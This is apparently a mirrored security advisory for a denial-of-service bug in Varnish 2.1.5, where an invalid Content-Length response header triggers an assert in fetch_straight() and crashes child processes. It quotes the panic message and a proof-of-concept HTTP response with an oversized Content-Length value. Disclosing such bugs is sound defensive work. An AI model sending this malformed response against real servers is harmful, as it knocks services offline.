Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29156
HistoryMar 11, 2013 - 12:00 a.m.

Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header

2013-03-1100:00:00
vulners.com
83

###############################################

fetch_straight() | ((uintmax_t)cl == cll)

###############################################

Authors:

22733db72ab3ed94b5f8a1ffcde850251fe6f466

c8e74ebd8392fda4788179f9a02bb49337638e7b

AKAT-1

#######################################

Versions: 2.1.5

Summary

It is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header.

  • Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true.

POC(response):
– cut –
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999

– cut –
EOF